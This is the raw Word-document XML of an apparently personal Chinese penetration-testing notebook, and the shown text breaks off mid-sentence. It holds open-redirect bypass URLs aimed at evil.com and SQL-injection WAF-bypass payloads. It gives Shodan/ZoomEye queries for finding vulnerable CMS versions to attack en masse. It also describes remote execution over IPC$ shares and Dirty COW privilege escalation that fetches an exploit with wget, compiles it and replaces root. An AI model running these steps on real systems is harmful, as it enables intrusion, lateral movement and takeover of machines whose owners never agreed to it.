          </w:rPr>
          <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00664EC7" w:rsidRDefault="00664EC7" w:rsidP="005474CB"/>
    <w:p w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="005474CB"/>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2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跳转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 直接跳转</w:t>
      </w:r>
    </w:p>
    <w:p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没做任何限制，参数后直接跟要跳转过去的网址就行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:t>2. 协议一致性</w:t>
      </w:r>
    </w:p>
    <w:p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当程序员校验跳转的网址协议必须为https时(有时候跳转不过去不会给提示)：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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s://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="66D9E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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB29BE" w:rsidRDefault="00972178" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="93A1A1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="00A14128" w:rsidRPr="008F549A">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untrust.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14128" w:rsidRDefault="00972178" w:rsidP="00BB29BE">
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidR="004F1A15" w:rsidRPr="0052521C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/201790.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE"/>
    <w:p w:rsidR="00FC2697" w:rsidRPr="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2697">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防火墙，一般都采用正则的方式进行拦截的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础绕过大小写、双重写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00531A8E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567482"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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协议层面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的检测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协议未覆盖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请求方式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get  -&gt;  post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content-type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参数污染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index.php?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&amp;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可能只检测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</w:p>
    <w:p w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE"/>
    <w:p w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/*之间插入内容*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>/*!50000select*/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>http://www.hacker.com/news/index.jsp?id=2862′ and/*%23%0a*/1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE"/>
    <w:p w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00531A8E">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F5F9"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="567482"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者/**/代替空格 例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531A8E" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>等价替换：and -&gt; &amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00531A8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、%26%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>or -&gt; ||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D676B" w:rsidRDefault="006D676B" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%a0')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE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0D6D409" wp14:editId="229DD89F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802130"/>
            <wp:effectExtent l="0" t="0" r="254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697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>se%le%ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p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Pr="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索引擎的使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>hodan</w:t>
      </w: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Pr="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D11994" w:rsidRPr="008027AB" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>oomeye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app:apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ------------ 组件名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、ver:2.2.9 ------------- 版本号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3、 port:22 ----------- 端口号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service:ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ------------- </w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索服务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os:linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --------- 操作系统类型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>6、hostname:google.com ------------- 分析列表“主机名”字段</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>7、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>country:cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>city:hefei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--------------查找国家</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>代码谷歌浏览器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>翻墙查看</w:t>
      </w:r>
      <w:r w:rsidR="007F5999">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="007F5999">
        <w:instrText xml:space="preserve"> HYPERLINK "https://link.jianshu.com?t=https:/zh.wikipedia.org/wiki/%E5%9B%BD%E5%AE%B6%E5%9C%B0%E5%8C%BA%E4%BB%A3%E7%A0%81" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidR="007F5999">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>此链接当前页"互联网"字段或“ISO 3166 2位字母代码”字段（注：英国gb）</w:t>
      </w:r>
      <w:r w:rsidR="007F5999">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>8、ip:8.8.8.8 ------------</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>9、cidr:8.8.8.8/24--------</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>地址网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t xml:space="preserve">实例：php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003853C3">
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t>edeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003853C3">
        <w:t xml:space="preserve"> ver:5.7.48 比如某天某个版本的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003853C3">
        <w:t>cms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003853C3">
        <w:t>出现了漏洞，你需要去刷一波</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="001C373D" w:rsidRPr="001C373D" w:rsidRDefault="001C373D" w:rsidP="001C373D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">net use \\ip\ipc$ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>copy d:\system.exe \\ip\c$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net time \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">at \\ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shij</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\system.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>at \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>services.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AD3AAE" w:rsidRDefault="00AD3AAE" w:rsidP="00F91404"/>
    <w:p w:rsidR="00AD3AAE" w:rsidRDefault="00AD3AAE" w:rsidP="00AD3AAE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>SRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3AAE" w:rsidRDefault="00972178" w:rsidP="00F91404">
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.dyboy.cn/websecurity/160.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网渗透</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="00972178" w:rsidP="0039199F">
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av88459896?from=search&amp;seid=12563701269010581597</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="00972178" w:rsidP="0039199F">
      <w:hyperlink r:id="rId100" w:history="1">
        <w:r w:rsidR="0039199F">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av33026520/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F"/>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权总结</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039199F" w:rsidRDefault="0094298A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127D02" wp14:editId="6DCC6BF6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000625" cy="228600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</w:p>
    <w:p w:rsidR="0039199F" w:rsidRP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Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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提权的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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前提：</w:t>
      </w:r>
    </w:p>
    <w:p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拿到了一个低权限的账号</w:t>
      </w:r>
    </w:p>
    <w:p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能上传和下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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机器上有python、java环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRPr="00162B31" w:rsidRDefault="00162B31" w:rsidP="00162B31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199F" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F1A15">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>脏牛提</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F1A15">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>漏洞范围</w:t>
      </w:r>
      <w:r>
        <w:t>：Linux内核 &gt;= 2.6.22（2007年发行，到2016年10月18日才修复）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>Exp下载</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/FireFart/dirtycow" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://github.com/FireFart/dirtycow</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.0.99/dirty.c -O /tmp/dirty.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o exp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（编译命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>exp feng （使用exp，后面的feng是密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>root已经替换成</w:t>
      </w:r>
